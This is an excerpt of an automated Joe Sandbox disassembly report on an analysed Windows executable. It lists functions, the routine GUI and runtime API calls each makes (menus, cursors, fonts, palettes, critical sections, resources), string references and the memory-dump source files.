GetCurrentThreadId.KERNEL32(00000000,004574CA,?,?,?,0045BD1C), ref: 00457488
WaitMessage.USER32 ref: 004574AA

Part of subcall function 0041B680: GetCurrentThreadId.KERNEL32(?,?,00000000), ref: 0041B689
Part of subcall function 0041B680: GetCurrentThreadId.KERNEL32(?,?,00000000), ref: 0041B698
Part of subcall function 0041B680: RtlEnterCriticalSection.KERNEL32(00464A04,?,?,00000000), ref: 0041B6D3
Part of subcall function 0041B680: SetEvent.KERNEL32(?,?,00464A04,?,?,00000000), ref: 0041B767
Part of subcall function 0041B680: RtlLeaveCriticalSection.KERNEL32(00464A04,0041B7A1,00464A04,?,?,00000000), ref: 0041B790

Part of subcall function 004572D4: IsWindowVisible.USER32(00000000), ref: 0045730C
Part of subcall function 004572D4: IsWindowEnabled.USER32(00000000), ref: 0045731D

Strings

4kE, xrefs: 004573DE, 004573E8, 00457439, 00457461, 00457449, 0045744C, 004573F4, 004573FD
0@F, xrefs: 0045748D

Memory Dump Source

Source File: 00000007.00000001.190110108.00401000.00000020.sdmp, Offset: 00400000, based on PE: true

Associated: 00000007.00000001.190103631.00400000.00000002.sdmp
Associated: 00000007.00000001.190122208.0045C000.00000004.sdmp
Associated: 00000007.00000001.190128665.0045D000.00000008.sdmp
Associated: 00000007.00000001.190135689.00464000.00000004.sdmp
Associated: 00000007.00000001.190141797.00466000.00000008.sdmp
Associated: 00000007.00000001.190148383.00468000.00000004.sdmp
Associated: 00000007.00000001.190155183.00469000.00000002.sdmp

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_1_400000_FB_390E.jbxd

Function 0044A214, Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 58

APIs

GetMenuItemInfoA.USER32(00000000,00000000,000000FF), ref: 0044A262
SetMenuItemInfoA.USER32(00000000,00000000,000000FF), ref: 0044A2B4
DrawMenuBar.USER32(00000000), ref: 0044A2C1

Strings

P, xrefs: 0044A254

Memory Dump Source

Source File: 00000007.00000001.190110108.00401000.00000020.sdmp, Offset: 00400000, based on PE: true

Associated: 00000007.00000001.190103631.00400000.00000002.sdmp
Associated: 00000007.00000001.190122208.0045C000.00000004.sdmp
Associated: 00000007.00000001.190128665.0045D000.00000008.sdmp
Associated: 00000007.00000001.190135689.00464000.00000004.sdmp
Associated: 00000007.00000001.190141797.00466000.00000008.sdmp
Associated: 00000007.00000001.190148383.00468000.00000004.sdmp
Associated: 00000007.00000001.190155183.00469000.00000002.sdmp

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_1_400000_FB_390E.jbxd

Function 00426624, Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 44

APIs

GetSystemMetrics.USER32(00000000), ref: 00426672
GetSystemMetrics.USER32(00000001), ref: 00426684

Part of subcall function 0042638C: GetProcAddress.KERNEL32(757A0000,00000000,00000000,0042644B), ref: 0042640C

Strings

MonitorFromPoint, xrefs: 00426636
$fB, xrefs: 0042663B, 00426648, 00426654

Memory Dump Source

Source File: 00000007.00000001.190110108.00401000.00000020.sdmp, Offset: 00400000, based on PE: true

Associated: 00000007.00000001.190103631.00400000.00000002.sdmp
Associated: 00000007.00000001.190122208.0045C000.00000004.sdmp
Associated: 00000007.00000001.190128665.0045D000.00000008.sdmp
Associated: 00000007.00000001.190135689.00464000.00000004.sdmp
Associated: 00000007.00000001.190141797.00466000.00000008.sdmp
Associated: 00000007.00000001.190148383.00468000.00000004.sdmp
Associated: 00000007.00000001.190155183.00469000.00000002.sdmp

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_1_400000_FB_390E.jbxd

Function 0040B134, Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 16

APIs

GetModuleHandleA.KERNEL32(kernel32.dll,?,0040BE0D,00000000,0040BE20), ref: 0040B13A
GetProcAddress.KERNEL32(00000000,GetDiskFreeSpaceExA,kernel32.dll,?,0040BE0D,00000000,0040BE20), ref: 0040B14B

Strings

GetDiskFreeSpaceExA, xrefs: 0040B145
kernel32.dll, xrefs: 0040B135

Memory Dump Source

Source File: 00000007.00000001.190110108.00401000.00000020.sdmp, Offset: 00400000, based on PE: true

Associated: 00000007.00000001.190103631.00400000.00000002.sdmp
Associated: 00000007.00000001.190122208.0045C000.00000004.sdmp
Associated: 00000007.00000001.190128665.0045D000.00000008.sdmp
Associated: 00000007.00000001.190135689.00464000.00000004.sdmp
Associated: 00000007.00000001.190141797.00466000.00000008.sdmp
Associated: 00000007.00000001.190148383.00468000.00000004.sdmp
Associated: 00000007.00000001.190155183.00469000.00000002.sdmp

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_1_400000_FB_390E.jbxd

Function 00434EA0, Relevance: 6.2, APIs: 4, Instructions: 204

APIs

GetDesktopWindow.USER32 ref: 00434F14
GetDesktopWindow.USER32 ref: 00435039

Part of subcall function 0043F03C: ShowCursor.USER32(00000000), ref: 0043F08D

Part of subcall function 0043F124: 6D3D5F83.COMCTL32(?,?), ref: 0043F152

Part of subcall function 0043F198: 6D3D5F17.COMCTL32(00000000,?,00435069), ref: 0043F1B4
Part of subcall function 0043F198: ShowCursor.USER32(000000FF), ref: 0043F1CF

SetCursor.USER32(00000000), ref: 00435079
SetCursor.USER32(00000000), ref: 0043508E

Memory Dump Source

Source File: 00000007.00000001.190110108.00401000.00000020.sdmp, Offset: 00400000, based on PE: true

Associated: 00000007.00000001.190103631.00400000.00000002.sdmp
Associated: 00000007.00000001.190122208.0045C000.00000004.sdmp
Associated: 00000007.00000001.190128665.0045D000.00000008.sdmp
Associated: 00000007.00000001.190135689.00464000.00000004.sdmp
Associated: 00000007.00000001.190141797.00466000.00000008.sdmp
Associated: 00000007.00000001.190148383.00468000.00000004.sdmp
Associated: 00000007.00000001.190155183.00469000.00000002.sdmp

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_1_400000_FB_390E.jbxd

Function 004511BC, Relevance: 6.1, APIs: 4, Instructions: 148

APIs

Part of subcall function 00406420: LoadStringA.USER32(00000000,0000FF94,?,00000400), ref: 00406451

GetMenu.USER32(00000000), ref: 004512E0
SetMenu.USER32(00000000,00000000), ref: 004512FD
SetMenu.USER32(00000000,00000000), ref: 00451332
SetMenu.USER32(00000000,00000000), ref: 0045134E

Part of subcall function 004510F4: GetMenu.USER32(00000000), ref: 0045113A
Part of subcall function 004510F4: SendMessageA.USER32(00000000,00000230,00000000,00000000), ref: 00451152
Part of subcall function 004510F4: DrawMenuBar.USER32(00000000), ref: 00451163

Memory Dump Source

Source File: 00000007.00000001.190110108.00401000.00000020.sdmp, Offset: 00400000, based on PE: true

Associated: 00000007.00000001.190103631.00400000.00000002.sdmp
Associated: 00000007.00000001.190122208.0045C000.00000004.sdmp
Associated: 00000007.00000001.190128665.0045D000.00000008.sdmp
Associated: 00000007.00000001.190135689.00464000.00000004.sdmp
Associated: 00000007.00000001.190141797.00466000.00000008.sdmp
Associated: 00000007.00000001.190148383.00468000.00000004.sdmp
Associated: 00000007.00000001.190155183.00469000.00000002.sdmp

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_1_400000_FB_390E.jbxd

Function 00454694, Relevance: 6.1, APIs: 4, Instructions: 99

APIs

Part of subcall function 00454A50: LoadCursorA.USER32(00000000,00007F00), ref: 00454A5D
Part of subcall function 00454A50: LoadCursorA.USER32(00000000,00000000), ref: 00454A8C

GetKeyboardLayout.USER32(00000000), ref: 004546D9
GetDC.USER32(00000000), ref: 0045472E
GetDeviceCaps.GDI32(00000000,0000005A), ref: 00454738
ReleaseDC.USER32(00000000,00000000), ref: 00454743

Part of subcall function 00454E70: SystemParametersInfoA.USER32(0000001F,0000003C,?,00000000), ref: 00454EC4
Part of subcall function 00454E70: CreateFontIndirectA.GDI32(?), ref: 00454ED1
Part of subcall function 00454E70: GetStockObject.GDI32(0000000D), ref: 00454EE7
Part of subcall function 00454E70: SystemParametersInfoA.USER32(00000029,00000000,00000154,00000000), ref: 00454F10
Part of subcall function 00454E70: CreateFontIndirectA.GDI32(?), ref: 00454F20
Part of subcall function 00454E70: CreateFontIndirectA.GDI32(?), ref: 00454F39
Part of subcall function 00454E70: GetStockObject.GDI32(0000000D), ref: 00454F5F

Memory Dump Source

Source File: 00000007.00000001.190110108.00401000.00000020.sdmp, Offset: 00400000, based on PE: true

Associated: 00000007.00000001.190103631.00400000.00000002.sdmp
Associated: 00000007.00000001.190122208.0045C000.00000004.sdmp
Associated: 00000007.00000001.190128665.0045D000.00000008.sdmp
Associated: 00000007.00000001.190135689.00464000.00000004.sdmp
Associated: 00000007.00000001.190141797.00466000.00000008.sdmp
Associated: 00000007.00000001.190148383.00468000.00000004.sdmp
Associated: 00000007.00000001.190155183.00469000.00000002.sdmp

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_1_400000_FB_390E.jbxd

Function 0040AB58, Relevance: 6.1, APIs: 4, Instructions: 95

APIs

GetThreadLocale.KERNEL32 ref: 0040AB82
GetStringTypeA.KERNEL32(00000409,00000002,?,00000080,?), ref: 0040AC4C
GetSystemMetrics.USER32(0000004A), ref: 0040AC77
GetSystemMetrics.USER32(0000002A), ref: 0040AC88

Part of subcall function 0040AAE0: GetCPInfo.KERNEL32(00000000,?), ref: 0040AAF9

Memory Dump Source

Source File: 00000007.00000001.190110108.00401000.00000020.sdmp, Offset: 00400000, based on PE: true

Associated: 00000007.00000001.190103631.00400000.00000002.sdmp
Associated: 00000007.00000001.190122208.0045C000.00000004.sdmp
Associated: 00000007.00000001.190128665.0045D000.00000008.sdmp
Associated: 00000007.00000001.190135689.00464000.00000004.sdmp
Associated: 00000007.00000001.190141797.00466000.00000008.sdmp
Associated: 00000007.00000001.190148383.00468000.00000004.sdmp
Associated: 00000007.00000001.190155183.00469000.00000002.sdmp

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_1_400000_FB_390E.jbxd

Function 00423004, Relevance: 6.1, APIs: 4, Instructions: 83

APIs

Part of subcall function 0041F704: RtlEnterCriticalSection.KERNEL32(00464A5C,00000000,0041E16E,00000000,0041E1CD), ref: 0041F70C
Part of subcall function 0041F704: RtlLeaveCriticalSection.KERNEL32(00464A5C,00464A5C,00000000,0041E16E,00000000,0041E1CD), ref: 0041F719
Part of subcall function 0041F704: RtlEnterCriticalSection.KERNEL32(00000038,00464A5C,00464A5C,00000000,0041E16E,00000000,0041E1CD), ref: 0041F722

Part of subcall function 00424420: GetDC.USER32(00000000), ref: 00424476
Part of subcall function 00424420: GetDeviceCaps.GDI32(00000000,0000000C), ref: 0042448B
Part of subcall function 00424420: GetDeviceCaps.GDI32(00000000,0000000E), ref: 00424495
Part of subcall function 00424420: CreateHalftonePalette.GDI32(00000000), ref: 004244B9
Part of subcall function 00424420: ReleaseDC.USER32(00000000,00000000), ref: 004244C4

CreateCompatibleDC.GDI32(00000000), ref: 00423059
SelectObject.GDI32(00000000,?), ref: 00423072
SelectPalette.GDI32(00000000,?,000000FF), ref: 0042309B
RealizePalette.GDI32(00000000), ref: 004230A7

Part of subcall function 0041F940: RtlLeaveCriticalSection.KERNEL32(00000038,00000000,0041E1BE,0041E1D4), ref: 0041F947
Part of subcall function 0041F940: RtlEnterCriticalSection.KERNEL32(00464A5C,00000038,00000000,0041E1BE,0041E1D4), ref: 0041F951
Part of subcall function 0041F940: RtlLeaveCriticalSection.KERNEL32(00464A5C,00464A5C,00000038,00000000,0041E1BE,0041E1D4), ref: 0041F95E

Memory Dump Source

Source File: 00000007.00000001.190110108.00401000.00000020.sdmp, Offset: 00400000, based on PE: true

Associated: 00000007.00000001.190103631.00400000.00000002.sdmp
Associated: 00000007.00000001.190122208.0045C000.00000004.sdmp
Associated: 00000007.00000001.190128665.0045D000.00000008.sdmp
Associated: 00000007.00000001.190135689.00464000.00000004.sdmp
Associated: 00000007.00000001.190141797.00466000.00000008.sdmp
Associated: 00000007.00000001.190148383.00468000.00000004.sdmp
Associated: 00000007.00000001.190155183.00469000.00000002.sdmp

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_1_400000_FB_390E.jbxd

Function 0044A86C, Relevance: 6.1, APIs: 4, Instructions: 72

APIs

GetMenuState.USER32(?,?,?), ref: 0044A88F
GetSubMenu.USER32(?,?), ref: 0044A89A
GetMenuItemID.USER32(?,?), ref: 0044A8B3
GetMenuStringA.USER32(?,?,?,?,?), ref: 0044A906

Memory Dump Source

Source File: 00000007.00000001.190110108.00401000.00000020.sdmp, Offset: 00400000, based on PE: true

Associated: 00000007.00000001.190103631.00400000.00000002.sdmp
Associated: 00000007.00000001.190122208.0045C000.00000004.sdmp
Associated: 00000007.00000001.190128665.0045D000.00000008.sdmp
Associated: 00000007.00000001.190135689.00464000.00000004.sdmp
Associated: 00000007.00000001.190141797.00466000.00000008.sdmp
Associated: 00000007.00000001.190148383.00468000.00000004.sdmp
Associated: 00000007.00000001.190155183.00469000.00000002.sdmp

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_1_400000_FB_390E.jbxd

Function 00422214, Relevance: 6.1, APIs: 4, Instructions: 64

APIs

SelectPalette.GDI32(00000000,00000000,000000FF), ref: 00422242
RealizePalette.GDI32(00000000), ref: 00422251
PlayEnhMetaFile.GDI32(00000000,?,?), ref: 00422283
SelectPalette.GDI32(00000000,00000000,000000FF), ref: 00422297

Memory Dump Source

Source File: 00000007.00000001.190110108.00401000.00000020.sdmp, Offset: 00400000, based on PE: true

Associated: 00000007.00000001.190103631.00400000.00000002.sdmp
Associated: 00000007.00000001.190122208.0045C000.00000004.sdmp
Associated: 00000007.00000001.190128665.0045D000.00000008.sdmp
Associated: 00000007.00000001.190135689.00464000.00000004.sdmp
Associated: 00000007.00000001.190141797.00466000.00000008.sdmp
Associated: 00000007.00000001.190148383.00468000.00000004.sdmp
Associated: 00000007.00000001.190155183.00469000.00000002.sdmp

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_1_400000_FB_390E.jbxd

Function 00455CF4, Relevance: 6.1, APIs: 4, Instructions: 57

APIs

EnumWindows.USER32(00455C84), ref: 00455D29
GetWindow.USER32(00000003,00000003), ref: 00455D41
GetWindowLongA.USER32(00000000,000000EC), ref: 00455D4E
SetWindowPos.USER32(00000000,00000000,00000000,00000000,00000000,00000000,00000213), ref: 00455D8D

Memory Dump Source

Source File: 00000007.00000001.190110108.00401000.00000020.sdmp, Offset: 00400000, based on PE: true

Associated: 00000007.00000001.190103631.00400000.00000002.sdmp
Associated: 00000007.00000001.190122208.0045C000.00000004.sdmp
Associated: 00000007.00000001.190128665.0045D000.00000008.sdmp
Associated: 00000007.00000001.190135689.00464000.00000004.sdmp
Associated: 00000007.00000001.190141797.00466000.00000008.sdmp
Associated: 00000007.00000001.190148383.00468000.00000004.sdmp
Associated: 00000007.00000001.190155183.00469000.00000002.sdmp

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_1_400000_FB_390E.jbxd

Function 004167E4, Relevance: 6.1, APIs: 4, Instructions: 51

APIs

FindResourceA.KERNEL32(?,?,?), ref: 004167FB
LoadResource.KERNEL32(?,00416584,?,?,?,00411F6C,?,00000001,00000000,?,00416754,?), ref: 00416815
SizeofResource.KERNEL32(?,00416584,?,00416584,?,?,?,00411F6C,?,00000001,00000000,?,00416754,?), ref: 0041682F
LockResource.KERNEL32(004160B0,00000000,?,00416584,?,00416584,?,?,?,00411F6C,?,00000001,00000000,?,00416754,?), ref: 00416839

Memory Dump Source

Source File: 00000007.00000001.190110108.00401000.00000020.sdmp, Offset: 00400000, based on PE: true

Associated: 00000007.00000001.190103631.00400000.00000002.sdmp
Associated: 00000007.00000001.190122208.0045C000.00000004.sdmp
Associated: 00000007.00000001.190128665.0045D000.00000008.sdmp
Associated: 00000007.00000001.190135689.00464000.00000004.sdmp
Associated: 00000007.00000001.190141797.00466000.00000008.sdmp
Associated: 00000007.00000001.190148383.00468000.00000004.sdmp
Associated: 00000007.00000001.190155183.00469000.00000002.sdmp

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_1_400000_FB_390E.jbxd

Function 00431A90, Relevance: 6.0, APIs: 4, Instructions: 46

APIs

Part of subcall function 004314DC: WinHelpA.USER32(00000000,004314F4,00000002,00000000), ref: 004314EB

GetTickCount.KERNEL32(00000000,00431B0D,?,?,00000000,00000000,?,00431A83), ref: 00431AAE
Sleep.KERNEL32(00000000,00000000,00431B0D,?,?,00000000,00000000,?,00431A83), ref: 00431AB7
GetTickCount.KERNEL32(00000000,00000000,00431B0D,?,?,00000000,00000000,?,00431A83), ref: 00431ABC
WinHelpA.USER32(00000000,?,?,00000000), ref: 00431AF2

Memory Dump Source

Source File: 00000007.00000001.190110108.00401000.00000020.sdmp, Offset: 00400000, based on PE: true

Associated: 00000007.00000001.190103631.00400000.00000002.sdmp
Associated: 00000007.00000001.190122208.0045C000.00000004.sdmp
Associated: 00000007.00000001.190128665.0045D000.00000008.sdmp
Associated: 00000007.00000001.190135689.00464000.00000004.sdmp
Associated: 00000007.00000001.190141797.00466000.00000008.sdmp
Associated: 00000007.00000001.190148383.00468000.00000004.sdmp
Associated: 00000007.00000001.190155183.00469000.00000002.sdmp

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_1_400000_FB_390E.jbxd

Function 00455610, Relevance: 6.0, APIs: 4, Instructions: 34

APIs

GetCurrentThreadId.KERNEL32 ref: 00455628
SetWindowsHookExA.USER32(00000003,004555CC,00000000,00000000), ref: 00455638
CreateEventA.KERNEL32(00000000,00000000,00000000,00000000), ref: 00455653
CreateThread.KERNEL32(00000000,000003E8,00455570,00000000,00000000), ref: 00455677

Memory Dump Source

Source File: 00000007.00000001.190110108.00401000.00000020.sdmp, Offset: 00400000, based on PE: true

Associated: 00000007.00000001.190103631.00400000.00000002.sdmp
Associated: 00000007.00000001.190122208.0045C000.00000004.sdmp
Associated: 00000007.00000001.190128665.0045D000.00000008.sdmp
Associated: 00000007.00000001.190135689.00464000.00000004.sdmp
Associated: 00000007.00000001.190141797.00466000.00000008.sdmp
Associated: 00000007.00000001.190148383.00468000.00000004.sdmp
Associated: 00000007.00000001.190155183.00469000.00000002.sdmp

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_1_400000_FB_390E.jbxd

Function 004259D0, Relevance: 6.0, APIs: 4, Instructions: 29

APIs

GetDC.USER32(00000000), ref: 004259D9
SelectObject.GDI32(00000000,018A002E), ref: 004259EB
GetTextMetricsA.GDI32(00000000), ref: 004259F6
ReleaseDC.USER32(00000000,00000000), ref: 00425A06

Memory Dump Source

Source File: 00000007.00000001.190110108.00401000.00000020.sdmp, Offset: 00400000, based on PE: true

Associated: 00000007.00000001.190103631.00400000.00000002.sdmp
Associated: 00000007.00000001.190122208.0045C000.00000004.sdmp
Associated: 00000007.00000001.190128665.0045D000.00000008.sdmp
Associated: 00000007.00000001.190135689.00464000.00000004.sdmp
Associated: 00000007.00000001.190141797.00466000.00000008.sdmp
Associated: 00000007.00000001.190148383.00468000.00000004.sdmp
Associated: 00000007.00000001.190155183.00469000.00000002.sdmp

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_1_400000_FB_390E.jbxd

Function 004238C8, Relevance: 6.0, APIs: 4, Instructions: 27

APIs

DeleteObject.GDI32(?), ref: 004238CC
DeleteDC.GDI32(?), ref: 004238EC
ReleaseDC.USER32(00000000,?), ref: 004238F7
GetObjectA.GDI32(?,00000054,?), ref: 0042390C

Memory Dump Source

Source File: 00000007.00000001.190110108.00401000.00000020.sdmp, Offset: 00400000, based on PE: true

Associated: 00000007.00000001.190103631.00400000.00000002.sdmp
Associated: 00000007.00000001.190122208.0045C000.00000004.sdmp
Associated: 00000007.00000001.190128665.0045D000.00000008.sdmp
Associated: 00000007.00000001.190135689.00464000.00000004.sdmp
Associated: 00000007.00000001.190141797.00466000.00000008.sdmp
Associated: 00000007.00000001.190148383.00468000.00000004.sdmp
Associated: 00000007.00000001.190155183.00469000.00000002.sdmp

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_1_400000_FB_390E.jbxd

Function 00407090, Relevance: 6.0, APIs: 4, Instructions: 11

APIs

GlobalHandle.KERNEL32 ref: 00407093
GlobalUnlock.KERNEL32(00000000), ref: 0040709A
GlobalReAlloc.KERNEL32(00000000,00000000), ref: 0040709F
GlobalLock.KERNEL32(00000000), ref: 004070A5

Memory Dump Source

Source File: 00000007.00000001.190110108.00401000.00000020.sdmp, Offset: 00400000, based on PE: true

Associated: 00000007.00000001.190103631.00400000.00000002.sdmp
Associated: 00000007.00000001.190122208.0045C000.00000004.sdmp
Associated: 00000007.00000001.190128665.0045D000.00000008.sdmp
Associated: 00000007.00000001.190135689.00464000.00000004.sdmp
Associated: 00000007.00000001.190141797.00466000.00000008.sdmp
Associated: 00000007.00000001.190148383.00468000.00000004.sdmp
Associated: 00000007.00000001.190155183.00469000.00000002.sdmp

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_1_400000_FB_390E.jbxd

Function 0041EAB0, Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 123

APIs

Part of subcall function 0041DE34: RtlEnterCriticalSection.KERNEL32(?,0041DE71), ref: 0041DE38

Part of subcall function 004083B8: CompareStringA.KERNEL32(00000400,00000001,00000000,00000000,00000000,00000000,?,?,0041EB86,00000000,0041EC11,?,00000000,0041EC39), ref: 004083E5

CreateFontIndirectA.GDI32(?), ref: 0041EBEE

Part of subcall function 0041DE40: RtlLeaveCriticalSection.KERNEL32(-00000008,0041DF1F,0041DF27), ref: 0041DE44

Strings

Default, xrefs: 0041EB7C
MS Sans Serif, xrefs: 0041EB8D

Memory Dump Source

Source File: 00000007.00000001.190110108.00401000.00000020.sdmp, Offset: 00400000, based on PE: true

Associated: 00000007.00000001.190103631.00400000.00000002.sdmp
Associated: 00000007.00000001.190122208.0045C000.00000004.sdmp
Associated: 00000007.00000001.190128665.0045D000.00000008.sdmp
Associated: 00000007.00000001.190135689.00464000.00000004.sdmp
Associated: 00000007.00000001.190141797.00466000.00000008.sdmp
Associated: 00000007.00000001.190148383.00468000.00000004.sdmp
Associated: 00000007.00000001.190155183.00469000.00000002.sdmp

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_1_400000_FB_390E.jbxd

Function 0043B13C, Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 111

APIs

Part of subcall function 0043B0A8: GetCapture.USER32 ref: 0043B0BB

DefWindowProcA.USER32(00000000,?,?,?), ref: 0043B243
GetCapture.USER32 ref: 0043B260

Part of subcall function 00438204: GetKeyboardState.USER32(?), ref: 0043833C

Strings

, xrefs: 0043B1B2

Memory Dump Source

Source File: 00000007.00000001.190110108.00401000.00000020.sdmp, Offset: 00400000, based on PE: true

Associated: 00000007.00000001.190103631.00400000.00000002.sdmp
Associated: 00000007.00000001.190122208.0045C000.00000004.sdmp
Associated: 00000007.00000001.190128665.0045D000.00000008.sdmp
Associated: 00000007.00000001.190135689.00464000.00000004.sdmp
Associated: 00000007.00000001.190141797.00466000.00000008.sdmp
Associated: 00000007.00000001.190148383.00468000.00000004.sdmp
Associated: 00000007.00000001.190155183.00469000.00000002.sdmp

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_1_400000_FB_390E.jbxd

Function 0044A0F0, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 84

APIs

GetKeyState.USER32(00000010), ref: 0044A114
GetKeyState.USER32(00000011), ref: 0044A126

Strings

, xrefs: 0044A136

Memory Dump Source

Source File: 00000007.00000001.190110108.00401000.00000020.sdmp, Offset: 00400000, based on PE: true

Associated: 00000007.00000001.190103631.00400000.00000002.sdmp
Associated: 00000007.00000001.190122208.0045C000.00000004.sdmp
Associated: 00000007.00000001.190128665.0045D000.00000008.sdmp
Associated: 00000007.00000001.190135689.00464000.00000004.sdmp
Associated: 00000007.00000001.190141797.00466000.00000008.sdmp
Associated: 00000007.00000001.190148383.00468000.00000004.sdmp
Associated: 00000007.00000001.190155183.00469000.00000002.sdmp

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_1_400000_FB_390E.jbxd

Function 00425A7B, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 84

APIs

RtlInitializeCriticalSection.KERNEL32(?,?,?), ref: 00425AF6
RtlEnterCriticalSection.KERNEL32(?,00425B74), ref: 00425B48

Strings

V, xrefs: 00425A7C

Memory Dump Source

Source File: 00000007.00000001.190110108.00401000.00000020.sdmp, Offset: 00400000, based on PE: true

Associated: 00000007.00000001.190103631.00400000.00000002.sdmp
Associated: 00000007.00000001.190122208.0045C000.00000004.sdmp
Associated: 00000007.00000001.190128665.0045D000.00000008.sdmp
Associated: 00000007.00000001.190135689.00464000.00000004.sdmp
Associated: 00000007.00000001.190141797.00466000.00000008.sdmp
Associated: 00000007.00000001.190148383.00468000.00000004.sdmp
Associated: 00000007.00000001.190155183.00469000.00000002.sdmp

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_1_400000_FB_390E.jbxd

Function 004245E0, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 72

APIs

RtlEnterCriticalSection.KERNEL32(00464A44), ref: 00424683
RtlLeaveCriticalSection.KERNEL32(00464A44,004246CE,00464A44), ref: 004246C1

Strings

DJF, xrefs: 0042462E

Memory Dump Source

Source File: 00000007.00000001.190110108.00401000.00000020.sdmp, Offset: 00400000, based on PE: true

Associated: 00000007.00000001.190103631.00400000.00000002.sdmp
Associated: 00000007.00000001.190122208.0045C000.00000004.sdmp
Associated: 00000007.00000001.190128665.0045D000.00000008.sdmp
Associated: 00000007.00000001.190135689.00464000.00000004.sdmp
Associated: 00000007.00000001.190141797.00466000.00000008.sdmp
Associated: 00000007.00000001.190148383.00468000.00000004.sdmp
Associated: 00000007.00000001.190155183.00469000.00000002.sdmp

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_1_400000_FB_390E.jbxd

Function 0043734C, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 56

APIs

IntersectRect.USER32(?,?,?), ref: 004373AC
EqualRect.USER32(?,?), ref: 004373BC

Strings

@, xrefs: 0043738D

Memory Dump Source

Source File: 00000007.00000001.190110108.00401000.00000020.sdmp, Offset: 00400000, based on PE: true

Associated: 00000007.00000001.190103631.00400000.00000002.sdmp
Associated: 00000007.00000001.190122208.0045C000.00000004.sdmp
Associated: 00000007.00000001.190128665.0045D000.00000008.sdmp
Associated: 00000007.00000001.190135689.00464000.00000004.sdmp
Associated: 00000007.00000001.190141797.00466000.00000008.sdmp
Associated: 00000007.00000001.190148383.00468000.00000004.sdmp
Associated: 00000007.00000001.190155183.00469000.00000002.sdmp

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_1_400000_FB_390E.jbxd

Function 0043F09C, Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 43

APIs

Part of subcall function 0043F100: 6D3D5FAE.COMCTL32(?,00000000,0043F0C5,00000000,00000000,00000000), ref: 0043F118

Part of subcall function 0043EE8C: ClientToScreen.USER32(?,0043F148), ref: 0043EEA4
Part of subcall function 0043EE8C: GetWindowRect.USER32(?,?), ref: 0043EEAE

6D3D5F55.COMCTL32(?,?,LPC,?,00000000,00000000,00000000), ref: 0043F0E7

Strings

LPC, xrefs: 0043F0CE
LPC, xrefs: 0043F0DB, 0043F0DE

Memory Dump Source

Source File: 00000007.00000001.190110108.00401000.00000020.sdmp, Offset: 00400000, based on PE: true

Associated: 00000007.00000001.190103631.00400000.00000002.sdmp
Associated: 00000007.00000001.190122208.0045C000.00000004.sdmp
Associated: 00000007.00000001.190128665.0045D000.00000008.sdmp
Associated: 00000007.00000001.190135689.00464000.00000004.sdmp
Associated: 00000007.00000001.190141797.00466000.00000008.sdmp
Associated: 00000007.00000001.190148383.00468000.00000004.sdmp
Associated: 00000007.00000001.190155183.00469000.00000002.sdmp

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_1_400000_FB_390E.jbxd

Function 004264FC, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 43

APIs

GetSystemMetrics.USER32(00000000), ref: 0042654D
GetSystemMetrics.USER32(00000001), ref: 00426559

Part of subcall function 0042638C: GetProcAddress.KERNEL32(757A0000,00000000,00000000,0042644B), ref: 0042640C

Strings

MonitorFromRect, xrefs: 00426511

Memory Dump Source

Source File: 00000007.00000001.190110108.00401000.00000020.sdmp, Offset: 00400000, based on PE: true

Associated: 00000007.00000001.190103631.00400000.00000002.sdmp
Associated: 00000007.00000001.190122208.0045C000.00000004.sdmp
Associated: 00000007.00000001.190128665.0045D000.00000008.sdmp
Associated: 00000007.00000001.190135689.00464000.00000004.sdmp
Associated: 00000007.00000001.190141797.00466000.00000008.sdmp
Associated: 00000007.00000001.190148383.00468000.00000004.sdmp
Associated: 00000007.00000001.190155183.00469000.00000002.sdmp

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_1_400000_FB_390E.jbxd

Function 00425A14, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 36

APIs

MulDiv.KERNEL32(00000008,00000060,00000048), ref: 00425A21

Part of subcall function 004259D0: GetDC.USER32(00000000), ref: 004259D9
Part of subcall function 004259D0: SelectObject.GDI32(00000000,018A002E), ref: 004259EB
Part of subcall function 004259D0: GetTextMetricsA.GDI32(00000000), ref: 004259F6
Part of subcall function 004259D0: ReleaseDC.USER32(00000000,00000000), ref: 00425A06

MulDiv.KERNEL32(00000009,00000060,00000048,00000008), ref: 00425A5D

Strings

MS Sans Serif, xrefs: 00425A4A

Memory Dump Source

Source File: 00000007.00000001.190110108.00401000.00000020.sdmp, Offset: 00400000, based on PE: true

Associated: 00000007.00000001.190103631.00400000.00000002.sdmp
Associated: 00000007.00000001.190122208.0045C000.00000004.sdmp
Associated: 00000007.00000001.190128665.0045D000.00000008.sdmp
Associated: 00000007.00000001.190135689.00464000.00000004.sdmp
